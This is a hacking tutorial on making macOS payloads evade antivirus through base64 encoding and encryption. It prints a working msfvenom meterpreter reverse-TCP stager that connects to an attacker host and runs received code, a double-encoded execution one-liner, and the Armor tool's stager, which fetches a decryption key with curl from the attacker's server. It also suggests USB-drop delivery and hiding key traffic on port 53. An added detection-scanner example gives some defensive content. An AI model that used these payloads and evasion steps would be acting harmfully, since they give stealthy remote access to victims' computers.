
How To Create an Undetectable Payload (Null Byte :: WonderHowTo)

Encrypting payloads and encoding stagers are more effective against macOS antivirus than you might think. In fact, it is very easy to evade VirusTotal and macOS antivirus programs with a few simple tricks.

The objective of this project was to find a well-known and easily detectable macOS payload and then find a method that allowed the same payload to execute on the target MacBook. This would reliably confirm whether any evasion method discovered was effective against known payloads. In addition to testing the malicious files against VirusTotal, they were tested on macOS Mojave (10.14) against popular antivirus programs such as Avast, AVG, BitDefender, Sophos and ClamXAV.

Readers should not confuse this topic with bypassing Gatekeeper or System Integrity Protection (SIP). Executing an unsigned application and evading virus scanners are two different topics. The focus of this article is evading detection by antivirus software and VirusTotal. As we will see below, in most cases simply encoding a payload is enough to evade antivirus detection.

Base64 Encoding Basics

Encoding, as an antivirus evasion technique, is (generally) a terrible idea; it is trivially decoded and identified. Encoding Python and Bash scripts is nevertheless common in projects such as Empire and msfvenom, because it lets a stager carry a complex script without worrying about stray special characters that could cause the payload to break or fail.

Let's talk about base64 encoding for a minute and look at the strings below.

  echo 'one' | base64
b25lCg==

  echo 'one two' | base64
b25lIHR3bwo=

  echo 'one two three' | base64
b25lIHR3byB0aHJlZQo=

  echo 'one two three four' | base64
b25lIHR3byB0aHJlZSBmb3VyCg==

  echo 'one two three four five' | base64
b25lIHR3byB0aHJlZSBmb3VyIGZpdmUK

All of the strings can be decoded just as easily (-d on Kali, -D on macOS) with the command below.

  base64 -d <<< 'b25lIHR3byB0aHJlZSBmb3VyIGZpdmUK'

Notice that the end of each string changes, while the beginning stays the same. The same goes for most payloads. If only the IP address and port number change, the beginning of the base64-encoded payload that msfvenom produces is identical for every hacker and pentester who uses it. Below is an example created by msfvenom with the IP address 10.42.0.1 (the address becomes visible once the blob is decoded, as shown further down).

aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=

The msfvenom output below uses the same payload but with a different IP address, 192.168.0.2.

aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4yJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==

No matter which IP and port are used, the first 143 characters of this msfvenom payload (everything up to the encoded IP address) are always identical. Even if an antivirus engine never decodes the blob to analyze the code inside, it would at least seem reasonable for it to flag such common base64 strings. They do not.

Simple Base64 Encoded Payloads

Believe it or not, finding a malicious file that VirusTotal and antivirus clients actually detect was a challenge. After a bit of searching the internet for popular "hacking macOS" articles, a three-year-old Null Byte article by community member psytech140 offered a simple msfvenom one-liner. Running the command below produced the following output.

  msfvenom -p python/meterpreter/reverse_tcp LHOST=10.42.0.1 LPORT=4444

[-] No platform was selected, choosing Msf::Module::Platform::Python from the payload
[-] No arch selected, selecting arch: python from the payload
Payload size: 446 bytes
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))

This is a base64-encoded Python one-liner designed to talk to Metasploit. Saving the single line to a file named "thisfileisevil.py" and uploading it to VirusTotal resulted in a detection rate of 4/58.

The detection rate is surprisingly low. Decoding the embedded base64 string clearly reveals a Python script designed to connect to a remote server (10.42.0.1) on port 4444.

  base64 -d <<< 'aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo='

import socket,struct,time
for x in range(10):
    try:
        s=socket.socket(2,socket.SOCK_STREAM)
        s.connect(('10.42.0.1',4444))
        break
    except:
        time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
    d+=s.recv(l-len(d))
exec(d,{'s':s})

Saving this decoded Python code to a file named "thisfileisevil_without_encoding.py" and uploading it to VirusTotal resulted in a detection rate of 1/56.

Interestingly, the raw Python code got an even lower detection rate.

At this point it is unclear exactly what VirusTotal and the antivirus programs are trying to detect. They do not do a good job of decoding base64 strings, or of flagging the 13-line Python script generated by msfvenom, which has undoubtedly been used thousands of times by pentesters and hackers over the years.

Double Base64 Encoded Payloads

If a plain encoded payload can evade most antivirus programs, double-encoding it should be an effective technique too, right? Well, not quite. Encoding the already-encoded msfvenom output and uploading it to VirusTotal resulted in a detection rate of 1/54.

Again, the single 1/54 detection came from Microsoft, which does not help any macOS user running antivirus software. This was achieved by first encoding the msfvenom output, the same payload shown above.

  cat thisfileisevil.py | base64


It can then be executed on the target MacBook with the following command.

  python -c "$(printf '%s' 'ENCODED-PAYLOAD-HERE' | base64 -D)"

Here printf and base64 are used on the MacBook to decode (-D) the string and immediately execute the result with Python (-c), which in turn decodes the inner payload and creates the reverse TCP connection.

To my surprise, both VirusTotal and the popular antivirus programs were evaded this way. Not one of the tested antivirus products could detect the double-encoded payload, whether it was stored as a text file or embedded in an AppleScript.

Encrypted Payloads

So far we have learned that encoding and double-encoding a payload will evade detection by most antivirus programs (even though the raw code fares better still). Nevertheless, encoding scripts and payloads is a cat-and-mouse game between hackers and antivirus developers. It is only a matter of time before someone at AVG or Avast reads this Null Byte article and antivirus scanners start recursively decoding base64 strings and looking for common encoded signatures.
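The recursive decoding described above is not hard to build. The following is an added example, not part of the original article or of any antivirus product, of a scanner that peels base64 layers and looks for the msfvenom python/meterpreter/reverse_tcp stager from the earlier sections, both as plaintext and through the fixed 32-character prefix that every encoded copy of it carries regardless of LHOST and LPORT. The sample files it scans are constructed here from the stager decoded above; the depth limit and the "opaque" blob standing in for an encrypted payload are assumptions for the demonstration.

```python
import base64
import binascii
import re

# Plaintext fragments of the msfvenom python/meterpreter/reverse_tcp stager decoded in the
# article, plus the base64 of its first 24 bytes ("import socket,struct,tim"): that 32-character
# string is the fixed prefix every encoded copy shares, whatever LHOST/LPORT were used.
MARKERS = (
    b"import socket,struct,time",
    b"struct.unpack('>I',s.recv(4))",
    b"exec(d,{'s':s})",
    base64.b64encode(b"import socket,struct,tim"),  # b'aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGlt'
)

# A run of 40+ base64 characters, tolerant of the line wrapping `base64` inserts every 76 columns.
B64_RUN = re.compile(rb"(?:[A-Za-z0-9+/]\s*){40,}={0,2}")


def _try_decode(run: bytes):
    """Decode one candidate run, dropping stray tail characters so a mis-cut run still decodes."""
    run = re.sub(rb"\s+", b"", run)
    run = run[: len(run) - len(run) % 4]
    try:
        return base64.b64decode(run, validate=True)
    except (binascii.Error, ValueError):
        return None


def scan(data: bytes, max_depth: int = 3, depth: int = 0):
    """Return (depth, marker) for the first known-stager hit, or None.

    depth 0 means the marker is visible in the file as-is, 1 after one base64 decode, and so on.
    """
    for marker in MARKERS:
        if marker in data:
            return depth, marker.decode()
    if depth >= max_depth:
        return None
    for match in B64_RUN.finditer(data):
        decoded = _try_decode(match.group(0))
        if decoded is None:
            continue
        hit = scan(decoded, max_depth, depth + 1)
        if hit is not None:
            return hit
    return None


# Constructed samples (not files from the article), built from the stager decoded above.
STAGER_SRC = (
    "import socket,struct,time\n"
    "for x in range(10):\n"
    "\ttry:\n"
    "\t\ts=socket.socket(2,socket.SOCK_STREAM)\n"
    "\t\ts.connect(('10.42.0.1',4444))\n"
    "\t\tbreak\n"
    "\texcept:\n"
    "\t\ttime.sleep(5)\n"
    "l=struct.unpack('>I',s.recv(4))[0]\n"
    "d=s.recv(l)\n"
    "while len(d)<l:\n"
    "\td+=s.recv(l-len(d))\n"
    "exec(d,{'s':s})\n"
).encode()
# The shape msfvenom emits: the stager base64'd inside a Python one-liner.
ONE_LINER = (
    b"import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}"
    b"[sys.version_info[0]]('" + base64.b64encode(STAGER_SRC) + b"')))"
)
DOUBLE = base64.encodebytes(ONE_LINER)   # `cat thisfileisevil.py | base64`, wrapped at 76 columns
TRIPLE = base64.encodebytes(DOUBLE)      # one more layer on top of that
# Stand-in for an encrypted payload: deterministic random-looking bytes, base64'd. Nothing to recurse into.
OPAQUE = base64.b64encode(bytes((i * 37 + 11) % 256 for i in range(300)))


if __name__ == "__main__":
    for name, sample in [("raw", STAGER_SRC), ("msfvenom", ONE_LINER), ("double", DOUBLE),
                         ("triple", TRIPLE), ("opaque", OPAQUE)]:
        print(f"{name:9s} -> {scan(sample)}")
```

The depth limit is the practical knob: each layer of base64 grows the file by a third, so a triple-encoded file is already conspicuous, and a scanner that stops after one or two layers still catches everything the article uploaded to VirusTotal. What it cannot do is see inside the opaque blob, which is exactly the gap the next section sets out to exploit.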

This got me thinking about a more reliable method of defeating macOS antivirus, a solution that is a bit more difficult to detect and prevent. Encrypting the payload, in addition to encoding it, provides a better way to evade antivirus scanners.

Why Is Encryption Better Than Encoding?

The primary disadvantage of encoding is that an antivirus program can simply keep decoding base64 strings until it finds the embedded payload. No matter how many times an attacker encodes a payload, it can be reversed. By encrypting the payload, the antivirus program only ever finds a blob of unreadable data. The encrypted payload cannot be scanned by AV software or read by people without the decryption key. Note that this only hides the payload itself: the stager that fetches the key and runs the decryption command is still plaintext and can be signatured, and once the payload is decrypted and executing, any behavioral monitoring on the host sees it in the clear.

Which brings me to Armor, a simple shell script I created to illustrate how encrypting macOS payloads can be automated and executed.

How the "Armor" Script Works

Armor encrypts the contents of whatever file it is given. The file can contain a one-liner, a complex Python script with hundreds of lines of code, or a post-exploitation script written in any programming language supported by macOS. The file contents are encrypted with a one-time key. The key is then temporarily hosted on the attacker's server and fetched by the target MacBook to decrypt the payload.

Below is an example of Armor used with a simple Netcat payload.

A few things happen in this GIF; I'll explain each step in order.

A Netcat listener is started on port 4444. The file "payload.txt" is read and shown to contain a simple Bash one-liner that, when run, creates a TCP connection from the target MacBook to the attacker's Netcat listener. Armor is used to encrypt the Bash one-liner. Ncat is used to host the decryption key on the attacker's server. When the stager runs on the target MacBook (not shown in the GIF), it decrypts and runs the Bash one-liner without writing any data to the hard drive. Ncat terminates the listener immediately after the key has been served. Once the Netcat connection is established, the attacker has remote access to the target MacBook.

For a technical explanation of what the script does and how it executes commands without writing data to the target's hard drive, head over to my GitHub page and read the comments. Readers interested in giving Armor a quick test run can follow the steps below.
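To make the key-hosting flow concrete, here is an added example that models Armor's three parts (attacker-side encryption, a key server that answers once, and a stager that fetches the key and decrypts in memory) in Python. This is not Armor's own code: Armor is a shell script built on openssl enc, curl and Ncat. The cipher below is a standard-library HMAC-SHA256 counter-mode stand-in for the AES that openssl provides, the stager text layout and the function names are hypothetical, and 10.42.0.1:443 is the attacker address used elsewhere in this article.

```python
import base64
import hashlib
import hmac
import os


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream from HMAC-SHA256; a stdlib stand-in for AES, not what Armor uses."""
    out = bytearray()
    block = 0
    while len(out) < length:
        out += hmac.new(key, nonce + block.to_bytes(4, "big"), hashlib.sha256).digest()
        block += 1
    return bytes(out[:length])


def encrypt(key: bytes, plaintext: bytes) -> bytes:
    """nonce || ciphertext || tag (encrypt-then-MAC), so a wrong key is rejected instead of yielding garbage."""
    nonce = os.urandom(16)
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def decrypt(key: bytes, blob: bytes) -> bytes:
    if len(blob) < 48:
        raise ValueError("blob too short")
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("tag mismatch: wrong key or tampered payload")
    return bytes(c ^ k for c, k in zip(ct, _keystream(key, nonce, len(ct))))


class OneShotKeyServer:
    """Models the Ncat listener Armor starts: hands the key to the first client, then shuts down."""

    def __init__(self, key: bytes):
        self._key = key
        self.closed = False

    def fetch(self):
        if self.closed:
            return None  # connection refused: the listener is gone after the first fetch
        self.closed = True
        return self._key


def armor(payload: bytes, key_url: str):
    """Attacker side: fresh one-time key, encrypted payload, stager text, and the key server."""
    key = os.urandom(32)
    blob = base64.b64encode(encrypt(key, payload)).decode()
    # Hypothetical stager layout: it carries only the ciphertext and where to fetch the key.
    # Armor's real stager wraps the equivalent curl/openssl pipeline in bash -c "$(...)".
    stager = f"KEY=$(curl -sk {key_url}); run_decrypted '{blob}' \"$KEY\""
    return stager, OneShotKeyServer(key)


def run_stager(stager: str, server: OneShotKeyServer):
    """Target side: pull the blob out of the stager, fetch the key once, decrypt in memory.

    Returns the plaintext payload, or None if the key server is gone or the tag does not verify.
    """
    blob = base64.b64decode(stager.split("'")[1])
    key = server.fetch()
    if key is None:
        return None
    try:
        return decrypt(key, blob)
    except ValueError:
        return None


def stager_leaks_payload(stager: str, payload: bytes) -> bool:
    """What a signature scanner that also decodes base64 could see: the payload, plain or encoded."""
    return payload in stager.encode() or base64.b64encode(payload) in stager.encode()


def demo(payload: bytes = b"ls -la\n") -> dict:
    stager, server = armor(payload, "https://10.42.0.1:443")
    return {
        "leaks": stager_leaks_payload(stager, payload),
        "first_run": run_stager(stager, server),                     # key served: payload recovered
        "second_run": run_stager(stager, server),                    # listener closed: nothing
        "wrong_key": run_stager(stager, OneShotKeyServer(bytes(32))),  # tag mismatch: nothing
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:11s} {value!r}")
```

Two properties matter for the evasion argument and both are visible in demo(): the stager contains the payload neither in plaintext nor in base64 form, so recursive decoding finds nothing, and the key exists on the wire exactly once, which is also why the "Improving the Attack" section below treats the key server as the weak point.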

Step 1: Install Armor

Armor can be found on my GitHub page and cloned with the command below.

  git clone https://github.com/tokyoneon/Armor

Cloning into 'Armor'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 7 (delta 0), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (7/7), done.

Change (cd) into the newly created Armor/ directory.

  cd Armor/

Give the script permission to execute.

  chmod +x armor.sh

Step 2: Create the Payload

In my example GIF a Bash one-liner is used to create a TCP connection, but let's simplify the attack by encrypting a trivial command, ls.

Use the command below to create the payload.txt file.

  echo 'ls -la' > /tmp/payload.txt

Step 3: Encrypt the Payload

Now encrypt the contents of payload.txt with Armor using the command below.

  ./armor.sh /tmp/payload.txt 10.42.0.1 443

[Armor ASCII-art banner, created by @tokyoneon_]

[+] Generated Encryption Key: /root/Armor/payload.txt_5c6c.key
[+] Encrypted Payload: /root/Armor/payload.txt_5c6c.enc
[+] Generated SSL Certificate: /root/Armor/payload.txt_5c6c.crt
[+] Generated SSL Key: /root/Armor/payload.txt_5c6c_ssl.key
[+] Saved Stager: /root/Armor/payload.txt_5c6c_stager.txt

[!] Execute on target MacBook:

bash -c "$(bash -c "$(printf '%s' 'YjAxMjMyZTU2ZTFhNDAxMDFlY2FlNjlkPi9kZXYvbnVsbCAyPiYxOyBvcGVuc3NsIGVuYyAtZCAt
cHM6Ly8weDBBMkEwMDAxOjQ0Myk=' | base64 -D)")"; history -c

[!] Start the Ncat listener now? y/n

[!] Starting Ncat listener:

The address argument (10.42.0.1 in this example) is the attacker's IP address where the decryption key will be hosted. This may be a local IP or the address of a virtual private server. The Ncat server uses this address and port number (443) to host the decryption key. Port 443 can be any free port on the attacker's Kali Linux system. Note that the stager refers to the key server by the hex form of the address: the tail of the encoded stager above decodes to "ps://0x0A2A0001:443)", and 0x0A2A0001 is 10.42.0.1, so anyone who decodes the stager can recover the attacker's address.

If LibreSSL (the OpenSSL fork used by macOS) is not found on Kali, Armor will try to install it, because the OpenSSL shipped with Kali/Debian is not compatible with macOS's LibreSSL for this purpose. The incompatibility comes from the passphrase-to-key derivation in openssl enc: OpenSSL 1.1.0 and later derive the key with SHA-256 by default, while LibreSSL still uses MD5, so a blob encrypted on one side will not decrypt on the other unless both are given the same digest with the -md option.

Step 4: Start Ncat Listener

Before running the stager, start the Ncat listener. Armor tries to start it automatically.

  [+] Ncat active for stager: payload.txt_e856 ...
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443

Step 5: Execute the Stager

Armor produces an encrypted and encoded command intended for the target MacBook. This stager may be embedded in an AppleScript for USB drop attacks, used in USB Rubber Ducky attacks, or utilized in other social-engineering attacks. For now, we'll just copy and paste the stager into a terminal on the MacBook. When the stager runs, the MacBook terminal lists (ls) all (-a) files in the current directory in long format (-l).

We've encrypted a single ls command, but imagine the possibilities when applying the same degree of obfuscation to a sophisticated Python script designed to carry out a series of advanced attacks. Antivirus software currently does not decode base64 strings, and even if it did, the embedded, encrypted payload could not be read without the key.

Improving the Attack

Armor is not perfect. It is a bit of a proof of concept that readers will hopefully find ways to improve. An alternative to LibreSSL, for example: because most Debian and Kali installs do not have it by default, it is an awkward encryption dependency.

Hosting the decryption key on the attacker's server is risky. If the attacker's IP address is recovered from the stager, it may be possible to work out the key's filename and download it. The key would allow the target to decrypt the payload and learn what kind of exploitation was performed on the MacBook.

Delivering the decryption key over UDP on port 53 would probably avoid detection by firewalls and deep packet inspection (DPI), making the attack much more "undetectable."

Additionally, there may be a way to encrypt payloads that does not depend on the target being connected to the internet (to download the decryption key).

Final Thoughts

After testing these attacks against VirusTotal and at least six popular antivirus programs, none could detect a double-encoded payload. macOS antivirus scanners barely seem to identify even the most common encoded payloads. Detecting something created by Armor will prove even more challenging for today's macOS antivirus scanners.

In addition, macOS relies too heavily on Gatekeeper to prevent malware from being opened. As shown in an earlier article, Gatekeeper protection is not applied to files on USB devices inserted into the MacBook, so targets can be socially engineered into opening malicious files.

To proactively defend against such attacks, readers should check out "How to Protect Yourself from macOS Attacks."

Don't Miss: How to Hack Mojave with a Self-Destructing Payload

Cover image and screenshots by tokyoneon/Null Byte
